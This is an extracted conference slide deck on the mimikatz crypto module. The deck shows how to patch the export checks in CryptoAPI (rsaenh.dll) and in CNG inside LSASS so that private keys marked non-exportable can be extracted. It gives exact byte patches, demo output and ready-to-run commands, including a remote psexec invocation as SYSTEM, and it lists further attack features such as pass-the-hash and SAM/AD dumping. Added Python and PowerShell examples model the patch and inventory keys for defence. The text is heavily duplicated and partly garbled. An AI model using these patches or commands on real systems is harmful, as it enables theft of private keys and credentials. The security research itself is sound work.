07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
mimikatz :: crypto :: patchcapi :: because I own my process
When we want to export a certificate with its private key (or only the key), the call goes into rsaenh!CPExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
(slide 42)
mimikatz # crypto::exportCertificates
Location : 'CERT_SYSTEM_STORE_CURRENT_USER'\My
  - Benjamin Delpy
    Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider      : Microsoft Enhanced Cryptographic Provider v1.0
    Type          : AT_KEYEXCHANGE
    Exportable    : NO
    Key size      : 2048
    Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
    Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

================ Certificate 0 ================
Serial Number: 112169417a1c3ef46a301f99385f50680fa0
Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
Subject: CN=Benjamin Delpy, C=FR
Non-root Certificate
Cert Hash(sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
  Key Container = 470ADFBA-8718-4014-B05E-B30776B75A03
  Provider = Microsoft Enhanced Cryptographic Provider v1.0
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.
mimikatz :: crypto :: patchcapi :: because I own my process
So what? A module in my own process returns that I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space.
(slide 43)
.text:0AC0B7CB 0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
    patched to:
.text:0AC0B7CB 90                   nop
.text:0AC0B7CC E9 33 C7 FF FF       jmp  continue_key_export_or_archive

.text:0AC1F749 0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
    patched to:
.text:0AC1F749 90                   nop
.text:0AC1F74A E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare
mimikatz :: crypto :: patchcapi :: demo time
Import, export, import as not exportable… export.
(slide 44)
mimikatz :: crypto :: patchcapi :: limitations
Because:
– I'm lazy
– I've seen, in the majority of cases, RSA keys in real-life use
  • Elliptic Curve, a little…
mimikatz crypto::patchcapi only deals with:
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
(slide 45)
mimikatz :: crypto :: cng :: how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not made in the "user" process context.
The process uses RPC to call "Key Isolation service" (KeyIso) functions.
It seems more secure than CryptoAPI…
– It is, but it's not perfect…
(slide 46)
mimikatz :: crypto :: cng :: how it's exported ( level)
[Diagram: CNG key export flow]
Process (CNG) --RPC--> KeyIso service (LSASS process; NT6 System protected process, ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP / SYSTEM_MANDATORY_LABEL_NO_READ_UP)
  Ask to export key -> Load private key (DPAPI decode) -> Exportable?
    yes -> Exported key
    no  -> NTE_NOT_SUPPORTED
  (PLAYSKOOL)
(slide 47)
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (KeyIso) – ncrypt!SPCryptExportKey.
This function does all the work to prepare the export and checks whether the key is exportable.
(slide 48)
mimikatz # crypto::exportKeys
[user]
CNG keys
  - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
    Exportable : NO
    Key size   : 2048
    Private export to 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO - mod_cryptong::getPrivateKey/PrivateKeyBlobToPVK (0x80090029) The requested operation is not supported.
mimikatz :: crypto :: patchcng :: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote "1" byte in LSASS memory space…
(slide 49)
.text:6C815210 75 1C    jnz  short continue_key_export
    patched to:
.text:6C815210 EB 1C    jmp  short continue_key_export
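The two listings (the two rsaenh!CPExportKey sites on slide 43 and the single ncrypt!SPCryptExportKey site just above) are the whole of the patch, and the reason they work is arithmetic on relative displacements. The following is an added example, not from the deck and not mimikatz's own code: a Python model of both byte patches applied to a buffer. The only inputs taken from the slides are the listed addresses and instruction bytes; the padding between the CAPI sites is constructed, and the symbol names in the comments are the ones the slides give, not resolved from any binary. It shows why overwriting `0F 85` with `90 E9` leaves the rel32 displacement, and so the branch target, untouched (two bytes per site, four in total), while the CNG site is a one-byte `75` to `EB` change.

```python
import struct

# Opcode bytes for the only jump forms that appear in the slide listings.
JNZ_REL32 = b"\x0f\x85"   # jnz rel32, 6 bytes
JNZ_REL8 = 0x75           # jnz short rel8, 2 bytes
JMP_REL32 = 0xE9          # jmp rel32, 5 bytes
JMP_REL8 = 0xEB           # jmp short rel8, 2 bytes
NOP = 0x90


def decode_branch(code, off, base):
    """Decode the instruction at code[off] in an image loaded at `base`.
    Returns (mnemonic, length, absolute target); a nop returns target None."""
    b0 = code[off]
    if code[off:off + 2] == JNZ_REL32:
        rel = struct.unpack_from("<i", code, off + 2)[0]
        return "jnz", 6, base + off + 6 + rel
    if b0 == JMP_REL32:
        rel = struct.unpack_from("<i", code, off + 1)[0]
        return "jmp", 5, base + off + 5 + rel
    if b0 == JNZ_REL8:
        rel = struct.unpack_from("<b", code, off + 1)[0]
        return "jnz short", 2, base + off + 2 + rel
    if b0 == JMP_REL8:
        rel = struct.unpack_from("<b", code, off + 1)[0]
        return "jmp short", 2, base + off + 2 + rel
    if b0 == NOP:
        return "nop", 1, None
    raise ValueError(f"unsupported opcode {b0:#04x} at {base + off:#010x}")


def effective_target(code, off, base):
    """Skip any nops at code[off] and return the target of the jump that follows."""
    while True:
        mnemonic, length, target = decode_branch(code, off, base)
        if mnemonic != "nop":
            return target
        off += length


def force_branch(code, off):
    """Return a copy of `code` where the jnz at code[off] is unconditional.
    The displacement bytes are never touched, so the target cannot move."""
    patched = bytearray(code)
    if code[off:off + 2] == JNZ_REL32:
        # 0F 85 rel32 -> 90 E9 rel32: the jmp begins one byte later and is one
        # byte shorter, so "address of next instruction + rel32" is unchanged.
        patched[off] = NOP
        patched[off + 1] = JMP_REL32
    elif code[off] == JNZ_REL8:
        # 75 rel8 -> EB rel8: same length, same displacement, one byte changed.
        patched[off] = JMP_REL8
    else:
        raise ValueError(f"no jnz at offset {off:#x}")
    return bytes(patched)


def apply_patches(code, base, site_addrs):
    """Force every jnz at the given absolute addresses. Returns
    (patched image, number of bytes changed, {site: (target before, target after)})."""
    patched = code
    targets = {}
    for addr in site_addrs:
        off = addr - base
        before = effective_target(code, off, base)
        patched = force_branch(patched, off)
        after = effective_target(patched, off, base)
        targets[addr] = (before, after)
    changed = sum(1 for a, b in zip(code, patched) if a != b)
    return patched, changed, targets


# Constructed sample images: only the bytes shown in the listings, at the
# offsets the listed addresses imply; everything else is int3 padding (0xCC).
# The addresses are from one 2012 build and will not match other versions.
CAPI_BASE = 0x0AC0B7CB
CAPI_SITES = {0x0AC0B7CB: b"\x0f\x85\x33\xc7\xff\xff",   # rsaenh!CPExportKey, site 1
              0x0AC1F749: b"\x0f\x85\xb6\x3b\xff\xff"}   # rsaenh!CPExportKey, site 2
_capi = bytearray(b"\xcc" * (max(CAPI_SITES) - CAPI_BASE + 6))
for _addr, _bytes in CAPI_SITES.items():
    _capi[_addr - CAPI_BASE:_addr - CAPI_BASE + len(_bytes)] = _bytes
CAPI_IMAGE = bytes(_capi)

CNG_BASE = 0x6C815210
CNG_IMAGE = b"\x75\x1c"                                   # ncrypt!SPCryptExportKey


def demo():
    """Run both patches and return (capi result, cng result) as apply_patches tuples."""
    capi = apply_patches(CAPI_IMAGE, CAPI_BASE, sorted(CAPI_SITES))
    cng = apply_patches(CNG_IMAGE, CNG_BASE, [CNG_BASE])
    return capi, cng


if __name__ == "__main__":
    for name, (image, changed, targets) in zip(("CAPI", "CNG"), demo()):
        print(f"{name}: {changed} byte(s) changed")
        for site, (before, after) in targets.items():
            print(f"  {site:#010x}: target {before:#010x} -> {after:#010x}")
```

Run as a script it prints the before/after targets for both images; applying the same transformation to a real rsaenh.dll or ncrypt.dll needs the offsets of that build, which the 2012 values above are not.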
mimikatz :: crypto :: patchcng :: demo time
Import, export, import as not exportable… export again.
(slide 50)
mimikatz :: crypto :: patchcng :: limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA)
Not a limitation of mimikatz, but the MMC snap-in for certificates cannot export CNG certificates… even those that are exportable (huh?)
– certutil can…
(slide 51)
mimikatz :: crypto :: patchcng :: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for the export can work too
– Yeah, like the good old certutil
(slide 52)
Before the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Private key is NOT exportable
Encryption test passed
CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
CertUtil: Key not valid for use in specified state.

After the patch:
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificate 1 ================
[…]
Cert Hash(sha1): dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Key Container = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Provider = Microsoft Software Key Storage Provider
Encryption test passed
CertUtil: -exportPFX command completed successfully.
mimikatz :: crypto :: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE" "crypto::exportKeys computer" exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password:
– PFX files are protected by this password: mimikatz
Keys:
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
  • So yes, mimikatz can export it
(slide 53)
mimikatz :: crypto :: what we can do
Exactly the same as for sekurlsa: prevent access to the accounts / the computer
– no admin, no admin, no admin…
Basics:
– Use smartcards / tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth:
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
(slide 54)
mimikatz :: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver:
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List notifications (process, thread, image, registry)
– List objects hooks and procedures
– …
…
(slide 55)
mimikatz :: that's all folks!
Thanks to / Merci à:
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
  • Partners and Sponsors, for sure
– Microsoft for always considering it as normal / acceptable
– Security friends / community for their ideas & challenges
  • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
(slide 56)
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
(slide 57)
mimikatz crypto patchcapi because I own my process
mimikatz crypto patchcapi because I own my process
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
So what A module in my own process return that I canrsquot do something CryptoAPI is in my memory space letrsquos patch it
I wrote ldquo4rdquo bytes in my memory space
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 43 43
text0AC0B7CB 0F 85 33 C7 FF FF jnz continue_key_export_or_archive
text0AC0B7CB 90 nop
text0AC0B7CC E9 33 C7 FF FF jmp continue_key_export_or_archive
text0AC1F749 0F 85 B6 3B FF FF jnz continue_key_export_or_archive_prepare
text0AC1F749 90 nop
text0AC1F74A E9 B6 3B FF FF jmp continue_key_export_or_archive_prepare
mimikatz crypto patchcapi demo time
mimikatz crypto patchcapi demo time
Import export import as not exportablehellip export
Import export import as not exportablehellip export
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 44 44
mimikatz crypto patchcapi limitations
mimikatz crypto patchcapi limitations
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
Because ndash Irsquom lazy
ndash Irsquove seen in majority of case RSA keys for real life use bull Elliptic Curve a littlehellip
mimikatz cryptopatchcapi only deal with ndash Microsoft Base Cryptographic Provider v10
ndash Microsoft Enhanced Cryptographic Provider v10
ndash Microsoft Enhanced RSA and AES Cryptographic Provider
ndash Microsoft RSA SChannel Cryptographic Provider
ndash Microsoft Strong Cryptographic Provider
hellipall based on rsaenhdll
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 45 45
mimikatz crypto cng how it works
mimikatz crypto cng how it works
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
ldquoCryptography API Next Generation (CNG) is the long-term replacement for the CryptoAPI CNG is designed to be extensible at many levels and cryptography agnostic in behaviorrdquo ndash httpmsdnmicrosoftcomlibrarywindowsdesktopaa376210aspx
ldquoTo comply with common criteria (CC) requirements the long-lived keys must be isolated so that they are never present in the application process CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default
This time keys operations are not made in the ldquouserrdquo process context
Process use RPC to call ldquoKey isolation servicerdquo (keyiso) functions
It seems more secure than CryptoAPIhellip ndash It is but itrsquos not perfecthellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 46 46
mimikatz crypto cng how itrsquos exported ( level)
mimikatz crypto cng how itrsquos exported ( level)
KeyIso Service (LSASS Process)
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 47 47
Process
CNG
Exportable
Load Private Key
Exported Key
yes
NTE_NOT_SUPPORTED
RPC
DPAPI Decode
PLAYSKOOL
Ask to export Key
NT6 System protected process ML_SYSTEM SYSTEM_MANDATORY_LABEL_NO_WRITE_UP SYSTEM_MANDATORY_LABEL_NO_READ_UP
no
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz cryptoexportKeys [user] Cleacutes CNG - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Exportabiliteacute NON Taille cleacute 2048 Export priveacute dans cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318pvk KO mod_cryptonggetPrivateKeyPrivateKeyBlobToPVK (0x80090029) Lopeacuteration demandeacutee nest pas prise en charge
Exportable
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
This time checks and keys are in LSASS processhellip And what
I wrote ldquo1rdquo byte in LSASS memory spacehellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 49 49
text6C815210 75 1C jnz short continue_key_export
text6C815210 EB 1C jmp short continue_key_export
mimikatz crypto patchcng demo time
mimikatz crypto patchcng demo time
Import export import as not exportablehellip export again
Import export import as not exportablehellip export again
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 50 50
mimikatz crypto patchcng limitations
mimikatz crypto patchcng limitations
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
Patch operation needs some privileges ndash Admin (debug privilege)
ndash SYSTEM
mimikatz cryptopatchcng only deal with ndash Microsoft Software Key Storage Provider (maybe others algs than RSA)
Not a limitation of mimikatz but MMC addin for certificates cannot export CNG certificateshellip even those that are exportable (hu ) ndash certutil canhellip
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 51 51
mimikatz crypto patchcng bonus
mimikatz crypto patchcng bonus
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
After one admin patched LSASS all users of current system benefit of extra exports
ndash until reboot KeyIso service restart
Some others programs that doesnrsquot check the export flag before asking export can work too
ndash Yeah like the old good one certutil
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 52 52
CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider La cleacute priveacutee NE PEUT PAS ecirctre exporteacutee Succegraves du test de chiffrement CertUtil -exportPFX EacuteCHEC de la commande 0x8009000b (-2146893813) CertUtil Cleacute non valide pour lutilisation dans leacutetat speacutecifieacute CUsersGentil KiwiDesktopgtcertutil -user -p export_waza -privatekey -exportpfx cng_user_noexport testpfx MY ================ Certificat 1 ================ [hellip] Hach cert (sha1) dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b Conteneur de cleacute = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318 Fournisseur = Microsoft Software Key Storage Provider Succegraves du test de chiffrement CertUtil -exportPFX La commande sest termineacutee correctement
mimikatz crypto memo
Some commands
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE "Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password
– PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times, exportable or not, Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it?
• So yes, mimikatz can export it
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 53
mimikatz crypto what we can do
Exactly the same as for sekurlsa: prevent access to accounts / the computer – no admin, no admin, no admin…
Basics
– Use smartcards / tokens for user certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with TPM from Windows 8
• Virtual SmartCard seems promising
– Verify vendors' implementations (Lenovo, Dell, …) of TPM CSP/KSP
• Their biometrics stuff was a little buggy ;)
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 54
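As an added example (not part of the deck), a PowerShell inventory that turns the "basics" above into something you can check: for every certificate with a private key it reports which provider holds the key, through which API (CAPI or CNG) and whether the key is flagged exportable. The function name and the list of provider names I treat as hardware-backed are my assumptions; anything not on that list is reported as software-hosted, which is the population the patchcapi/patchcng tricks reach whatever the export flag says. It assumes Windows PowerShell 5.1 (.NET Framework 4.6.1 or later for the certificate extension helpers) and an elevated session for the machine store.

```powershell
# Added example, not from the original deck: where does each certificate's
# private key actually live? Software-hosted keys are DPAPI blobs handled by
# rsaenh.dll (CAPI) or by KeyIso in lsass (CNG); hardware-backed keys are not.
# Assumptions: Windows PowerShell 5.1 / .NET Framework 4.6.1+, elevated for LocalMachine.
Add-Type -AssemblyName System.Core

# Assumed list of hardware-backed providers; extend it for third-party HSM/token KSPs.
$HardwareBackedProviders = @(
    'Microsoft Smart Card Key Storage Provider',   # CNG, smartcard / token
    'Microsoft Platform Crypto Provider',          # CNG, TPM (Windows 8 and later)
    'Microsoft Base Smart Card Crypto Provider'    # CAPI, smartcard minidriver
)

function Get-CertificateKeyHosting {
    param([string[]]$StorePaths = @('Cert:\CurrentUser\My', 'Cert:\LocalMachine\My'))

    foreach ($path in $StorePaths) {
        foreach ($cert in (Get-ChildItem -Path $path -ErrorAction SilentlyContinue)) {
            if (-not $cert.HasPrivateKey) { continue }

            $api = 'unknown'; $provider = $null; $exportable = $null; $alg = $null
            try {
                # RSA first, then ECDSA; each helper returns $null for other algorithms.
                $alg = [System.Security.Cryptography.X509Certificates.RSACertificateExtensions]::GetRSAPrivateKey($cert)
                if ($null -eq $alg) {
                    $alg = [System.Security.Cryptography.X509Certificates.ECDsaCertificateExtensions]::GetECDsaPrivateKey($cert)
                }
                if ($alg -is [System.Security.Cryptography.RSACryptoServiceProvider]) {
                    # Legacy CryptoAPI CSP: key material is decrypted inside the calling process
                    $api        = 'CAPI'
                    $provider   = $alg.CspKeyContainerInfo.ProviderName
                    $exportable = $alg.CspKeyContainerInfo.Exportable
                } elseif ($null -ne $alg -and $null -ne $alg.Key) {
                    # CNG (RSACng / ECDsaCng): operations are proxied over RPC to KeyIso in lsass
                    $api        = 'CNG'
                    $provider   = $alg.Key.Provider.Provider
                    $exportable = ($alg.Key.ExportPolicy -ne [System.Security.Cryptography.CngExportPolicies]::None)
                }
            } catch {
                $api = "error: $($_.Exception.Message)"   # e.g. no access to a machine key
            } finally {
                if ($alg) { $alg.Dispose() }
            }

            [pscustomobject]@{
                Store          = $path
                Subject        = $cert.Subject
                Thumbprint     = $cert.Thumbprint
                Api            = $api
                Provider       = $provider
                Exportable     = $exportable
                HardwareBacked = ($HardwareBackedProviders -contains $provider)
            }
        }
    }
}

# Usage: list the software-hosted keys, the ones an LSASS / CSP patch can reach.
Get-CertificateKeyHosting | Where-Object { -not $_.HardwareBacked } |
    Format-Table Store, Subject, Api, Provider, Exportable -AutoSize
```

Exportable = $false on a software-hosted key is no comfort here, as slides 48 to 52 show; the useful column is HardwareBacked, and the useful follow-up is moving the keys that matter to a smartcard, TPM or HSM as the slide recommends.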
mimikatz what else can it do
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilter actions
– List Notifications (process, thread, image, registry)
– List Objects hooks and procedures
– …
…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 55
mimikatz that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity
• Partners and Sponsors for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges
• nagual, newsoft, mubix, …
– You for your attention
Questions?
Don't be shy ;)
especially if you have written down the corresponding slide number
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 56
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 57
mimikatz crypto patchcapi demo time
Import, export, import as not exportable… export
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 44
mimikatz crypto patchcapi limitations
Because
– I'm lazy
– I've seen, in the majority of cases, RSA keys for real-life use
• Elliptic Curve a little…
mimikatz crypto::patchcapi only deals with
– Microsoft Base Cryptographic Provider v1.0
– Microsoft Enhanced Cryptographic Provider v1.0
– Microsoft Enhanced RSA and AES Cryptographic Provider
– Microsoft RSA SChannel Cryptographic Provider
– Microsoft Strong Cryptographic Provider
…all based on rsaenh.dll
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 45
mimikatz crypto cng how it works
"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." – http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx
"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."
This time, key operations are not performed in the "user" process context
The process uses RPC to call "Key isolation service" (keyiso) functions
It seems more secure than CryptoAPI… – It is, but it's not perfect…
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 46
mimikatz crypto cng how it's exported ( level)
[Diagram: Process → CNG → RPC → KeyIso Service (LSASS Process). Process side: "Ask to export Key". KeyIso side: Load Private Key → DPAPI Decode → Exportable? yes → Exported Key; no → NTE_NOT_SUPPORTED. LSASS is an NT6 System protected process: ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP. Other label in the figure: PLAYSKOOL]
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 47
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key), the RPC calls lead to lsass (keyiso) / ncrypt!SPCryptExportKey
This function does all the work to prepare the export and checks whether the key is exportable
07/11/2012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamin@gentilkiwi.com blog.gentilkiwi.com 48
mimikatz # crypto::exportKeys
[user] Clés CNG:
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
	Exportabilité: NON
	Taille clé: 2048
